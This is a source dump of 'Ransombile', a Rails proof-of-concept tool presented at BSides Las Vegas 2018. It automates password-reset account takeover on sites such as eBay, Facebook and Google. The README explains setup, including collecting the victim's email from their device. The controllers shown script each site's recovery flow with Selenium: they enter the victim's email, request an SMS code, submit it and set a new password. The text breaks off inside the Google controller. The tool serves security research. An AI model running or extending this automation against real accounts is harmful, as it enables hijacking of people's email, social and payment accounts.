├── Gemfile ├── Gemfile.lock ├── README.md ├── Rakefile ├── app ├── assets │ ├── config │ │ └── manifest.js │ ├── images │ │ └── .keep │ ├── javascripts │ │ ├── application.js │ │ ├── cable.js │ │ ├── channels │ │ │ └── .keep │ │ ├── ebay.coffee │ │ ├── facebook.coffee │ │ ├── google.coffee │ │ ├── linkedin.coffee │ │ ├── paypal.coffee │ │ ├── ransombile.coffee │ │ ├── steam.coffee │ │ ├── twitter.coffee │ │ ├── website_template.coffee │ │ └── wordpress.coffee │ └── stylesheets │ │ ├── application.css │ │ ├── ebay.scss │ │ ├── facebook.scss │ │ ├── google.scss │ │ ├── linkedin.scss │ │ ├── paypal.scss │ │ ├── ransombile.scss │ │ ├── steam.scss │ │ ├── twitter.scss │ │ ├── website_template.scss │ │ └── wordpress.scss ├── channels │ └── application_cable │ │ ├── channel.rb │ │ └── connection.rb ├── controllers │ ├── application_controller.rb │ ├── concerns │ │ └── .keep │ ├── ebay_controller.rb │ ├── facebook_controller.rb │ ├── google_controller.rb │ ├── linkedin_controller.rb │ ├── paypal_controller.rb │ ├── ransombile_controller.rb │ ├── steam_controller.rb │ ├── twitter_controller.rb │ ├── website_template_controller.rb │ └── wordpress_controller.rb ├── helpers │ ├── application_helper.rb │ ├── ebay_helper.rb │ ├── facebook_helper.rb │ ├── google_helper.rb │ ├── linkedin_helper.rb │ ├── paypal_helper.rb │ ├── ransombile_helper.rb │ ├── steam_helper.rb │ ├── twitter_helper.rb │ ├── website_template_helper.rb │ └── wordpress_helper.rb ├── jobs │ └── application_job.rb ├── mailers │ └── application_mailer.rb ├── models │ ├── application_record.rb │ └── concerns │ │ └── .keep └── views │ ├── layouts │ ├── application.html.erb │ ├── mailer.html.erb │ └── mailer.text.erb │ └── ransombile │ └── index.html.erb ├── bin ├── bundle ├── rails ├── rake ├── setup ├── spring └── update ├── config.ru ├── config ├── application.rb ├── boot.rb ├── cable.yml ├── database.yml ├── environment.rb ├── environments │ ├── development.rb │ ├── production.rb │ └── test.rb ├── initializers 
│ ├── application_controller_renderer.rb │ ├── assets.rb │ ├── backtrace_silencers.rb │ ├── cookies_serializer.rb │ ├── filter_parameter_logging.rb │ ├── inflections.rb │ ├── mime_types.rb │ ├── new_framework_defaults.rb │ ├── session_store.rb │ └── wrap_parameters.rb ├── locales │ └── en.yml ├── puma.rb ├── routes.rb ├── secrets.yml └── spring.rb ├── db ├── development.sqlite3 └── seeds.rb ├── lib ├── assets │ └── .keep └── tasks │ └── .keep ├── log └── .keep ├── public ├── 404.html ├── 422.html ├── 500.html ├── apple-touch-icon-precomposed.png ├── apple-touch-icon.png ├── favicon.ico └── robots.txt ├── test ├── controllers │ ├── .keep │ ├── ebay_controller_test.rb │ ├── facebook_controller_test.rb │ ├── google_controller_test.rb │ ├── linkedin_controller_test.rb │ ├── paypal_controller_test.rb │ ├── ransombile_controller_test.rb │ ├── steam_controller_test.rb │ ├── twitter_controller_test.rb │ ├── website_template_controller_test.rb │ └── wordpress_controller_test.rb ├── fixtures │ ├── .keep │ └── files │ │ └── .keep ├── helpers │ └── .keep ├── integration │ └── .keep ├── mailers │ └── .keep ├── models │ └── .keep └── test_helper.rb ├── tmp ├── .keep └── restart.txt └── vendor └── assets ├── javascripts └── .keep └── stylesheets └── .keep /Gemfile: -------------------------------------------------------------------------------- 1 | source 'https://rubygems.org' 2 | 3 | git_source(:github) do |repo_name| 4 | repo_name = "#{repo_name}/#{repo_name}" unless repo_name.include?("/") 5 | "https://github.com/#{repo_name}.git" 6 | end 7 | 8 | 9 | # Bundle edge Rails instead: gem 'rails', github: 'rails/rails' 10 | gem 'rails', '~> 5.0.2' 11 | # Use sqlite3 as the database for Active Record 12 | gem 'sqlite3' 13 | # Use Puma as the app server 14 | gem 'puma', '~> 3.0' 15 | # Use SCSS for stylesheets 16 | gem 'sass-rails', '~> 5.0' 17 | # Use Uglifier as compressor for JavaScript assets 18 | gem 'uglifier', '>= 1.3.0' 19 | # Use CoffeeScript for .coffee assets and views 20 
| gem 'coffee-rails', '~> 4.2' 21 | # See https://github.com/rails/execjs#readme for more supported runtimes 22 | # gem 'therubyracer', platforms: :ruby 23 | 24 | # Use jquery as the JavaScript library 25 | gem 'jquery-rails' 26 | # Turbolinks makes navigating your web application faster. Read more: https://github.com/turbolinks/turbolinks 27 | gem 'turbolinks', '~> 5' 28 | # Build JSON APIs with ease. Read more: https://github.com/rails/jbuilder 29 | gem 'jbuilder', '~> 2.5' 30 | # Use Redis adapter to run Action Cable in production 31 | # gem 'redis', '~> 3.0' 32 | # Use ActiveModel has_secure_password 33 | # gem 'bcrypt', '~> 3.1.7' 34 | 35 | # Use Capistrano for deployment 36 | # gem 'capistrano-rails', group: :development 37 | 38 | group :development, :test do 39 | # Call 'byebug' anywhere in the code to stop execution and get a debugger console 40 | gem 'byebug', platform: :mri 41 | end 42 | 43 | group :development do 44 | # Access an IRB console on exception pages or by using <%= console %> anywhere in the code. 45 | gem 'web-console', '>= 3.3.0' 46 | gem 'listen', '~> 3.0.5' 47 | # Spring speeds up development by keeping your application running in the background. 
Read more: https://github.com/rails/spring 48 | gem 'spring' 49 | gem 'spring-watcher-listen', '~> 2.0.0' 50 | end 51 | 52 | # Windows does not include zoneinfo files, so bundle the tzinfo-data gem 53 | gem 'tzinfo-data', platforms: [:mingw, :mswin, :x64_mingw, :jruby] 54 | 55 | #To support Selenium 56 | gem 'selenium-webdriver' -------------------------------------------------------------------------------- /Gemfile.lock: -------------------------------------------------------------------------------- 1 | GEM 2 | remote: https://rubygems.org/ 3 | specs: 4 | actioncable (5.0.6) 5 | actionpack (= 5.0.6) 6 | nio4r (>= 1.2, < 3.0) 7 | websocket-driver (~> 0.6.1) 8 | actionmailer (5.0.6) 9 | actionpack (= 5.0.6) 10 | actionview (= 5.0.6) 11 | activejob (= 5.0.6) 12 | mail (~> 2.5, >= 2.5.4) 13 | rails-dom-testing (~> 2.0) 14 | actionpack (5.0.6) 15 | actionview (= 5.0.6) 16 | activesupport (= 5.0.6) 17 | rack (~> 2.0) 18 | rack-test (~> 0.6.3) 19 | rails-dom-testing (~> 2.0) 20 | rails-html-sanitizer (~> 1.0, >= 1.0.2) 21 | actionview (5.0.6) 22 | activesupport (= 5.0.6) 23 | builder (~> 3.1) 24 | erubis (~> 2.7.0) 25 | rails-dom-testing (~> 2.0) 26 | rails-html-sanitizer (~> 1.0, >= 1.0.3) 27 | activejob (5.0.6) 28 | activesupport (= 5.0.6) 29 | globalid (>= 0.3.6) 30 | activemodel (5.0.6) 31 | activesupport (= 5.0.6) 32 | activerecord (5.0.6) 33 | activemodel (= 5.0.6) 34 | activesupport (= 5.0.6) 35 | arel (~> 7.0) 36 | activesupport (5.0.6) 37 | concurrent-ruby (~> 1.0, >= 1.0.2) 38 | i18n (~> 0.7) 39 | minitest (~> 5.1) 40 | tzinfo (~> 1.1) 41 | arel (7.1.4) 42 | bindex (0.5.0) 43 | builder (3.2.3) 44 | byebug (9.1.0) 45 | childprocess (0.8.0) 46 | ffi (~> 1.0, >= 1.0.11) 47 | coffee-rails (4.2.2) 48 | coffee-script (>= 2.2.0) 49 | railties (>= 4.0.0) 50 | coffee-script (2.4.1) 51 | coffee-script-source 52 | execjs 53 | coffee-script-source (1.12.2) 54 | concurrent-ruby (1.0.5) 55 | crass (1.0.2) 56 | erubis (2.7.0) 57 | execjs (2.7.0) 58 | ffi (1.9.18) 59 | 
globalid (0.4.0) 60 | activesupport (>= 4.2.0) 61 | i18n (0.8.6) 62 | jbuilder (2.7.0) 63 | activesupport (>= 4.2.0) 64 | multi_json (>= 1.2) 65 | jquery-rails (4.3.1) 66 | rails-dom-testing (>= 1, < 3) 67 | railties (>= 4.2.0) 68 | thor (>= 0.14, < 2.0) 69 | listen (3.0.8) 70 | rb-fsevent (~> 0.9, >= 0.9.4) 71 | rb-inotify (~> 0.9, >= 0.9.7) 72 | loofah (2.1.1) 73 | crass (~> 1.0.2) 74 | nokogiri (>= 1.5.9) 75 | mail (2.6.6) 76 | mime-types (>= 1.16, < 4) 77 | method_source (0.9.0) 78 | mime-types (3.1) 79 | mime-types-data (~> 3.2015) 80 | mime-types-data (3.2016.0521) 81 | mini_portile2 (2.3.0) 82 | minitest (5.10.3) 83 | multi_json (1.12.2) 84 | nio4r (2.1.0) 85 | nokogiri (1.8.1) 86 | mini_portile2 (~> 2.3.0) 87 | puma (3.10.0) 88 | rack (2.0.3) 89 | rack-test (0.6.3) 90 | rack (>= 1.0) 91 | rails (5.0.6) 92 | actioncable (= 5.0.6) 93 | actionmailer (= 5.0.6) 94 | actionpack (= 5.0.6) 95 | actionview (= 5.0.6) 96 | activejob (= 5.0.6) 97 | activemodel (= 5.0.6) 98 | activerecord (= 5.0.6) 99 | activesupport (= 5.0.6) 100 | bundler (>= 1.3.0) 101 | railties (= 5.0.6) 102 | sprockets-rails (>= 2.0.0) 103 | rails-dom-testing (2.0.3) 104 | activesupport (>= 4.2.0) 105 | nokogiri (>= 1.6) 106 | rails-html-sanitizer (1.0.3) 107 | loofah (~> 2.0) 108 | railties (5.0.6) 109 | actionpack (= 5.0.6) 110 | activesupport (= 5.0.6) 111 | method_source 112 | rake (>= 0.8.7) 113 | thor (>= 0.18.1, < 2.0) 114 | rake (12.1.0) 115 | rb-fsevent (0.10.2) 116 | rb-inotify (0.9.10) 117 | ffi (>= 0.5.0, < 2) 118 | rubyzip (1.2.1) 119 | sass (3.5.1) 120 | sass-listen (~> 4.0.0) 121 | sass-listen (4.0.0) 122 | rb-fsevent (~> 0.9, >= 0.9.4) 123 | rb-inotify (~> 0.9, >= 0.9.7) 124 | sass-rails (5.0.6) 125 | railties (>= 4.0.0, < 6) 126 | sass (~> 3.1) 127 | sprockets (>= 2.8, < 4.0) 128 | sprockets-rails (>= 2.0, < 4.0) 129 | tilt (>= 1.1, < 3) 130 | selenium-webdriver (3.6.0) 131 | childprocess (~> 0.5) 132 | rubyzip (~> 1.0) 133 | spring (2.0.2) 134 | activesupport (>= 4.2) 135 | 
spring-watcher-listen (2.0.1) 136 | listen (>= 2.7, < 4.0) 137 | spring (>= 1.2, < 3.0) 138 | sprockets (3.7.1) 139 | concurrent-ruby (~> 1.0) 140 | rack (> 1, < 3) 141 | sprockets-rails (3.2.1) 142 | actionpack (>= 4.0) 143 | activesupport (>= 4.0) 144 | sprockets (>= 3.0.0) 145 | sqlite3 (1.3.13) 146 | thor (0.20.0) 147 | thread_safe (0.3.6) 148 | tilt (2.0.8) 149 | turbolinks (5.0.1) 150 | turbolinks-source (~> 5) 151 | turbolinks-source (5.0.3) 152 | tzinfo (1.2.3) 153 | thread_safe (~> 0.1) 154 | uglifier (3.2.0) 155 | execjs (>= 0.3.0, < 3) 156 | web-console (3.5.1) 157 | actionview (>= 5.0) 158 | activemodel (>= 5.0) 159 | bindex (>= 0.4.0) 160 | railties (>= 5.0) 161 | websocket-driver (0.6.5) 162 | websocket-extensions (>= 0.1.0) 163 | websocket-extensions (0.1.2) 164 | 165 | PLATFORMS 166 | ruby 167 | 168 | DEPENDENCIES 169 | byebug 170 | coffee-rails (~> 4.2) 171 | jbuilder (~> 2.5) 172 | jquery-rails 173 | listen (~> 3.0.5) 174 | puma (~> 3.0) 175 | rails (~> 5.0.2) 176 | sass-rails (~> 5.0) 177 | selenium-webdriver 178 | spring 179 | spring-watcher-listen (~> 2.0.0) 180 | sqlite3 181 | turbolinks (~> 5) 182 | tzinfo-data 183 | uglifier (>= 1.3.0) 184 | web-console (>= 3.3.0) 185 | 186 | BUNDLED WITH 187 | 1.14.6 188 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Ransombile 2 | 3 | Ransombile is a tool that automates the password reset process and allows you to perform the entire flow automatically for multiple sites at the same time. The aim is to automate the three steps that take the longest in our proposed attack vector. 4 | 5 | This tool only serves as a PoC to show that password reset can be automated effectively. Consider it an Alpha version. Things will fail and some sites I added don't work for various reasons (UI in a language different than English, A/B testing, timing issues, etc.). 
6 | 7 | For details and demos please check: [https://www.martinvigo.com/ransombile](https://www.martinvigo.com/ransombile) 8 | 9 | ## Installation 10 | 11 | Ransombile is a Rails app. It should work on any version, but I wrote and tested it on Ruby 2.4 and Rails 5.0. 12 | 13 | ## Setup 14 | 15 | You need an email inbox to which you will be sending emails from the victim's device to retrieve the victim's email address. Add the credentials information to the *ransombile_controller* file. 16 | 17 | You can change the Selenium plugin to use any browser, but it comes configured to use Firefox by default to make development and testing easier. In fact, if you were to "deploy" Ransombile, you would probably want to use a headless browser like PhantomJS. 18 | 19 | ## Usage 20 | 21 | Launch the server and run the webapp on any browser. It is optimized for mobile device screen sizes. 22 | 23 | ```rails server``` 24 | 25 | ## Adding websites 26 | 27 | I left a template under */controllers/website_template_controller*. It gives you a skeleton with the basic functions and implementation. Just add the missing code where indicated. 28 | 29 | You can create a new controller using the new website name: 30 | 31 | ```rails generate controller Websitename``` 32 | 33 | Next, you need to update the UI, file *index.html.erb*. Just copy and paste what's already there for any other site. Don't forget to update the function *initiatePasswordReset()*! 
34 | 35 | Last, update the *routes* file 36 | 37 | ## Demo video 38 | [![Ransombile demo video](https://img.youtube.com/vi/-d152pJ_Ua0/0.jpg)](https://www.youtube.com/watch?v=-d152pJ_Ua0) 39 | 40 | ## Tool presentation at BSides Las Vegas 2018 41 | [![Ransombile presentation at Bsides Las Vegas 2018](https://img.youtube.com/vi/7MbgFTJrhss/0.jpg)](https://www.youtube.com/watch?v=7MbgFTJrhss) 42 | 43 | ## Authors 44 | 45 | Martin Vigo - @martin_vigo - [martinvigo.com](https://www.martinvigo.com) 46 | -------------------------------------------------------------------------------- /Rakefile: -------------------------------------------------------------------------------- 1 | # Add your own tasks in files placed in lib/tasks ending in .rake, 2 | # for example lib/tasks/capistrano.rake, and they will automatically be available to Rake. 3 | 4 | require_relative 'config/application' 5 | 6 | Rails.application.load_tasks 7 | -------------------------------------------------------------------------------- /app/assets/config/manifest.js: -------------------------------------------------------------------------------- 1 | //= link_tree ../images 2 | //= link_directory ../javascripts .js 3 | //= link_directory ../stylesheets .css 4 | -------------------------------------------------------------------------------- /app/assets/images/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/app/assets/images/.keep -------------------------------------------------------------------------------- /app/assets/javascripts/application.js: -------------------------------------------------------------------------------- 1 | // This is a manifest file that'll be compiled into application.js, which will include all the files 2 | // listed below. 
3 | // 4 | // Any JavaScript/Coffee file within this directory, lib/assets/javascripts, vendor/assets/javascripts, 5 | // or any plugin's vendor/assets/javascripts directory can be referenced here using a relative path. 6 | // 7 | // It's not advisable to add code directly here, but if you do, it'll appear at the bottom of the 8 | // compiled file. JavaScript code in this file should be added after the last require_* statement. 9 | // 10 | // Read Sprockets README (https://github.com/rails/sprockets#sprockets-directives) for details 11 | // about supported directives. 12 | // 13 | //= require jquery 14 | //= require jquery_ujs 15 | //= require turbolinks 16 | //= require_tree . 17 | -------------------------------------------------------------------------------- /app/assets/javascripts/cable.js: -------------------------------------------------------------------------------- 1 | // Action Cable provides the framework to deal with WebSockets in Rails. 2 | // You can generate new channels where WebSocket features live using the rails generate channel command. 3 | // 4 | //= require action_cable 5 | //= require_self 6 | //= require_tree ./channels 7 | 8 | (function() { 9 | this.App || (this.App = {}); 10 | 11 | App.cable = ActionCable.createConsumer(); 12 | 13 | }).call(this); 14 | -------------------------------------------------------------------------------- /app/assets/javascripts/channels/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/app/assets/javascripts/channels/.keep -------------------------------------------------------------------------------- /app/assets/javascripts/ebay.coffee: -------------------------------------------------------------------------------- 1 | # Place all the behaviors and hooks related to the matching controller here. 2 | # All this logic will automatically be available in application.js. 
3 | # You can use CoffeeScript in this file: http://coffeescript.org/ 4 | -------------------------------------------------------------------------------- /app/assets/javascripts/facebook.coffee: -------------------------------------------------------------------------------- 1 | # Place all the behaviors and hooks related to the matching controller here. 2 | # All this logic will automatically be available in application.js. 3 | # You can use CoffeeScript in this file: http://coffeescript.org/ 4 | -------------------------------------------------------------------------------- /app/assets/javascripts/google.coffee: -------------------------------------------------------------------------------- 1 | # Place all the behaviors and hooks related to the matching controller here. 2 | # All this logic will automatically be available in application.js. 3 | # You can use CoffeeScript in this file: http://coffeescript.org/ 4 | -------------------------------------------------------------------------------- /app/assets/javascripts/linkedin.coffee: -------------------------------------------------------------------------------- 1 | # Place all the behaviors and hooks related to the matching controller here. 2 | # All this logic will automatically be available in application.js. 3 | # You can use CoffeeScript in this file: http://coffeescript.org/ 4 | -------------------------------------------------------------------------------- /app/assets/javascripts/paypal.coffee: -------------------------------------------------------------------------------- 1 | # Place all the behaviors and hooks related to the matching controller here. 2 | # All this logic will automatically be available in application.js. 
3 | # You can use CoffeeScript in this file: http://coffeescript.org/ 4 | -------------------------------------------------------------------------------- /app/assets/javascripts/ransombile.coffee: -------------------------------------------------------------------------------- 1 | # Place all the behaviors and hooks related to the matching controller here. 2 | # All this logic will automatically be available in application.js. 3 | # You can use CoffeeScript in this file: http://coffeescript.org/ 4 | -------------------------------------------------------------------------------- /app/assets/javascripts/steam.coffee: -------------------------------------------------------------------------------- 1 | # Place all the behaviors and hooks related to the matching controller here. 2 | # All this logic will automatically be available in application.js. 3 | # You can use CoffeeScript in this file: http://coffeescript.org/ 4 | -------------------------------------------------------------------------------- /app/assets/javascripts/twitter.coffee: -------------------------------------------------------------------------------- 1 | # Place all the behaviors and hooks related to the matching controller here. 2 | # All this logic will automatically be available in application.js. 3 | # You can use CoffeeScript in this file: http://coffeescript.org/ 4 | -------------------------------------------------------------------------------- /app/assets/javascripts/website_template.coffee: -------------------------------------------------------------------------------- 1 | # Place all the behaviors and hooks related to the matching controller here. 2 | # All this logic will automatically be available in application.js. 
3 | # You can use CoffeeScript in this file: http://coffeescript.org/ 4 | -------------------------------------------------------------------------------- /app/assets/javascripts/wordpress.coffee: -------------------------------------------------------------------------------- 1 | # Place all the behaviors and hooks related to the matching controller here. 2 | # All this logic will automatically be available in application.js. 3 | # You can use CoffeeScript in this file: http://coffeescript.org/ 4 | -------------------------------------------------------------------------------- /app/assets/stylesheets/application.css: -------------------------------------------------------------------------------- 1 | /* 2 | * This is a manifest file that'll be compiled into application.css, which will include all the files 3 | * listed below. 4 | * 5 | * Any CSS and SCSS file within this directory, lib/assets/stylesheets, vendor/assets/stylesheets, 6 | * or any plugin's vendor/assets/stylesheets directory can be referenced here using a relative path. 7 | * 8 | * You're free to add application-wide styles to this file and they'll appear at the bottom of the 9 | * compiled file so the styles you add here take precedence over styles defined in any other CSS/SCSS 10 | * files in this directory. Styles in this file should be added after the last require_* statement. 11 | * It is generally better to create a new file per style scope. 12 | * 13 | *= require_tree . 14 | *= require_self 15 | */ 16 | -------------------------------------------------------------------------------- /app/assets/stylesheets/ebay.scss: -------------------------------------------------------------------------------- 1 | // Place all the styles related to the Ebay controller here. 2 | // They will automatically be included in application.css. 
3 | // You can use Sass (SCSS) here: http://sass-lang.com/ 4 | -------------------------------------------------------------------------------- /app/assets/stylesheets/facebook.scss: -------------------------------------------------------------------------------- 1 | // Place all the styles related to the Facebook controller here. 2 | // They will automatically be included in application.css. 3 | // You can use Sass (SCSS) here: http://sass-lang.com/ 4 | -------------------------------------------------------------------------------- /app/assets/stylesheets/google.scss: -------------------------------------------------------------------------------- 1 | // Place all the styles related to the Google controller here. 2 | // They will automatically be included in application.css. 3 | // You can use Sass (SCSS) here: http://sass-lang.com/ 4 | -------------------------------------------------------------------------------- /app/assets/stylesheets/linkedin.scss: -------------------------------------------------------------------------------- 1 | // Place all the styles related to the Linkedin controller here. 2 | // They will automatically be included in application.css. 3 | // You can use Sass (SCSS) here: http://sass-lang.com/ 4 | -------------------------------------------------------------------------------- /app/assets/stylesheets/paypal.scss: -------------------------------------------------------------------------------- 1 | // Place all the styles related to the Paypal controller here. 2 | // They will automatically be included in application.css. 3 | // You can use Sass (SCSS) here: http://sass-lang.com/ 4 | -------------------------------------------------------------------------------- /app/assets/stylesheets/ransombile.scss: -------------------------------------------------------------------------------- 1 | // Place all the styles related to the Ransombile controller here. 2 | // They will automatically be included in application.css. 
3 | // You can use Sass (SCSS) here: http://sass-lang.com/ 4 | 5 | #mainDiv{ 6 | width: 95%; 7 | margin: auto; 8 | padding: 15px; 9 | } 10 | 11 | .label{ 12 | font-size: 3em; 13 | font-weight: bold; 14 | } 15 | 16 | .statusLabel, #emailVictimLabel, #phoneVictimLabel{ 17 | font-size: 2.8em; 18 | font-style: italic; 19 | margin-left: 10px; 20 | } 21 | 22 | input{ 23 | width: 69%; 24 | font-size: 50px; 25 | } 26 | 27 | button { 28 | float: right; 29 | height: 90px; 30 | width: 180px; 31 | font-size: 30px; 32 | text-align: center; 33 | color: red; 34 | border: 5px solid red; 35 | } 36 | 37 | .inputAndButton{ 38 | width: 100%; 39 | margin-bottom: 30px; 40 | } 41 | 42 | #title{ 43 | margin-bottom: 20px; 44 | text-align: center; 45 | display: block; 46 | font-size: 9em; 47 | } 48 | 49 | #passwordInput{ 50 | margin-bottom: 20px; 51 | } 52 | 53 | #emailVictimLabel, #phoneVictimLabel{ 54 | color: blue; 55 | text-decoration: underline; 56 | } 57 | 58 | 59 | #labelAndStatus{ 60 | float: left; 61 | width: 100%; 62 | display: block; 63 | font-size: 3em; 64 | } 65 | 66 | #border{ 67 | border: solid 3px; 68 | padding: 15px; 69 | margin-bottom: 100px; 70 | margin-bottom: 40px; 71 | } 72 | 73 | 74 | #phoneLabels, #emailLabels{ 75 | display: block; 76 | } 77 | -------------------------------------------------------------------------------- /app/assets/stylesheets/steam.scss: -------------------------------------------------------------------------------- 1 | // Place all the styles related to the Steam controller here. 2 | // They will automatically be included in application.css. 3 | // You can use Sass (SCSS) here: http://sass-lang.com/ 4 | -------------------------------------------------------------------------------- /app/assets/stylesheets/twitter.scss: -------------------------------------------------------------------------------- 1 | // Place all the styles related to the Twitter controller here. 2 | // They will automatically be included in application.css. 
3 | // You can use Sass (SCSS) here: http://sass-lang.com/ 4 | -------------------------------------------------------------------------------- /app/assets/stylesheets/website_template.scss: -------------------------------------------------------------------------------- 1 | // Place all the styles related to the WebsiteTemplate controller here. 2 | // They will automatically be included in application.css. 3 | // You can use Sass (SCSS) here: http://sass-lang.com/ 4 | -------------------------------------------------------------------------------- /app/assets/stylesheets/wordpress.scss: -------------------------------------------------------------------------------- 1 | // Place all the styles related to the Wordpress controller here. 2 | // They will automatically be included in application.css. 3 | // You can use Sass (SCSS) here: http://sass-lang.com/ 4 | -------------------------------------------------------------------------------- /app/channels/application_cable/channel.rb: -------------------------------------------------------------------------------- 1 | module ApplicationCable 2 | class Channel < ActionCable::Channel::Base 3 | end 4 | end 5 | -------------------------------------------------------------------------------- /app/channels/application_cable/connection.rb: -------------------------------------------------------------------------------- 1 | module ApplicationCable 2 | class Connection < ActionCable::Connection::Base 3 | end 4 | end 5 | -------------------------------------------------------------------------------- /app/controllers/application_controller.rb: -------------------------------------------------------------------------------- 1 | require "selenium-webdriver" 2 | 3 | class ApplicationController < ActionController::Base 4 | protect_from_forgery with: :exception 5 | 6 | end 7 | -------------------------------------------------------------------------------- /app/controllers/concerns/.keep: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/app/controllers/concerns/.keep -------------------------------------------------------------------------------- /app/controllers/ebay_controller.rb: -------------------------------------------------------------------------------- 1 | class EbayController < ApplicationController 2 | $selenium_driver = nil 3 | 4 | # To start the password reset process using the email 5 | def initiate 6 | begin 7 | $selenium_driver = Selenium::WebDriver.for :firefox 8 | base_url = "https://fyp.ebay.com/" 9 | $selenium_driver.get(base_url) 10 | 11 | wait = Selenium::WebDriver::Wait.new(:timeout => 5) 12 | wait.until { $selenium_driver.find_element(:id, "userInfo").displayed? } 13 | $selenium_driver.find_element(:id, "userInfo").send_keys params[:email] 14 | $selenium_driver.find_element(:id, "userInfo").send_keys :return 15 | 16 | wait.until { $selenium_driver.find_element(:id, "defaulttext").displayed? } 17 | $selenium_driver.find_element(:id, "defaulttext").click 18 | 19 | render :json => {"website": "ebay", "status": "Waiting for temp code..."} # Replace WEBSITE with appropiate website name 20 | 21 | rescue Exception => e 22 | puts e.to_s 23 | puts e.backtrace 24 | render :status => 500, :json => {"website": "ebay", "status": "Password reset failed!"} # Replace WEBSITE with appropiate website name 25 | end 26 | end 27 | 28 | 29 | 30 | # To handle the temp code input, set new password and finish the password reset process 31 | def finish 32 | begin 33 | wait = Selenium::WebDriver::Wait.new(:timeout => 5) 34 | wait.until { $selenium_driver.find_element(:id, "pinTxtBx").displayed? } 35 | $selenium_driver.find_element(:id, "pinTxtBx").send_keys params[:temp_code] 36 | $selenium_driver.find_element(:id, "pinTxtBx").send_keys :return 37 | 38 | wait.until { $selenium_driver.find_element(:id, "password").displayed? 
} 39 | $selenium_driver.find_element(:id, "password").send_keys params[:password] 40 | $selenium_driver.find_element(:id, "password").send_keys :return 41 | 42 | render :json => {"website": "ebay", "status": "Password reset successful!"} # Replace WEBSITE with appropiate website name 43 | 44 | rescue Exception => e 45 | puts e.to_s 46 | puts e.backtrace 47 | render :status => 500, :json => {"website": "ebay", "status": "Password reset failed!"} # Replace WEBSITE with appropiate website name 48 | end 49 | end 50 | 51 | end 52 | -------------------------------------------------------------------------------- /app/controllers/facebook_controller.rb: -------------------------------------------------------------------------------- 1 | class FacebookController < ApplicationController 2 | $selenium_driver = nil 3 | 4 | # To start the password reset process using the email 5 | def initiate 6 | begin 7 | $selenium_driver = Selenium::WebDriver.for :firefox 8 | base_url = "https://www.facebook.com/recover/initiate" 9 | $selenium_driver.get(base_url) 10 | 11 | wait = Selenium::WebDriver::Wait.new(:timeout => 5) 12 | wait.until { $selenium_driver.find_element(:id => "identify_email").displayed? } 13 | $selenium_driver.find_element(:id, "identify_email").clear 14 | $selenium_driver.find_element(:id, "identify_email").send_keys params[:email] 15 | $selenium_driver.find_element(:xpath, "//input[contains(@value,'Search')]").click 16 | 17 | wait.until { $selenium_driver.find_element(:xpath, "//input[contains(@id,'send_sms')]").displayed? } 18 | $selenium_driver.find_element(:xpath, "//input[contains(@id,'send_sms')]").click 19 | if not $selenium_driver.find_element(:xpath, "//input[contains(@id,'send_sms')]").selected? 
# double check 20 | $selenium_driver.find_element(:xpath, "//input[contains(@id,'send_sms')]").click 21 | end 22 | $selenium_driver.find_element(:xpath, "//button[@type='submit']").click 23 | 24 | render :json => {"website": "facebook", "status": "Waiting for temp code..."} 25 | 26 | rescue Exception => e 27 | puts e.to_s 28 | puts e.backtrace 29 | render :status => 500, :json => {"website": "facebook", "status": "Password reset failed!"} 30 | end 31 | end 32 | 33 | 34 | 35 | # To handle the temp code input, set new password and finish the password reset process 36 | def finish 37 | begin 38 | wait = Selenium::WebDriver::Wait.new(:timeout => 5) 39 | wait.until { $selenium_driver.find_element(:name => "n").displayed? } 40 | $selenium_driver.find_element(:name, "n").clear 41 | $selenium_driver.find_element(:name, "n").send_keys params[:temp_code] 42 | $selenium_driver.find_element(:xpath, "//button[@type='submit']").click 43 | 44 | wait.until { $selenium_driver.find_element(:id => "password_new").displayed? 
} 45 | $selenium_driver.find_element(:id, "password_new").clear 46 | $selenium_driver.find_element(:id, "password_new").send_keys params[:password] 47 | $selenium_driver.find_element(:id, "btn_continue").click 48 | 49 | render :json => {"website": "facebook", "status": "Password reset successful!"} 50 | 51 | rescue Exception => e 52 | puts e.to_s 53 | puts e.backtrace 54 | render :status => 500, :json => {"website": "facebook", "status": "Password reset failed!"} 55 | end 56 | end 57 | 58 | end 59 | -------------------------------------------------------------------------------- /app/controllers/google_controller.rb: -------------------------------------------------------------------------------- 1 | class GoogleController < ApplicationController 2 | $selenium_driver = nil 3 | 4 | 5 | def initiate 6 | begin 7 | $selenium_driver = Selenium::WebDriver.for :firefox 8 | base_url = "https://accounts.google.com?hl=en" 9 | $selenium_driver.get(base_url) 10 | wait = Selenium::WebDriver::Wait.new(:timeout => 5) 11 | 12 | begin # Handles Google's A/B testing 13 | $selenium_driver.find_element(:id, "Email").clear 14 | $selenium_driver.find_element(:id, "Email").send_keys params[:email] 15 | $selenium_driver.find_element(:id, "next").click 16 | 17 | wait.until { $selenium_driver.find_element(:id => "link-forgot-passwd").displayed? } 18 | $selenium_driver.find_element(:id, "link-forgot-passwd").click 19 | rescue Selenium::WebDriver::Error::NoSuchElementError => e 20 | $selenium_driver.find_element(:id, "identifierId").clear 21 | $selenium_driver.find_element(:id, "identifierId").send_keys params[:email] 22 | $selenium_driver.find_element(:id, "identifierId").send_keys :return 23 | 24 | wait.until { $selenium_driver.find_element(:id, "forgotPassword").displayed? 
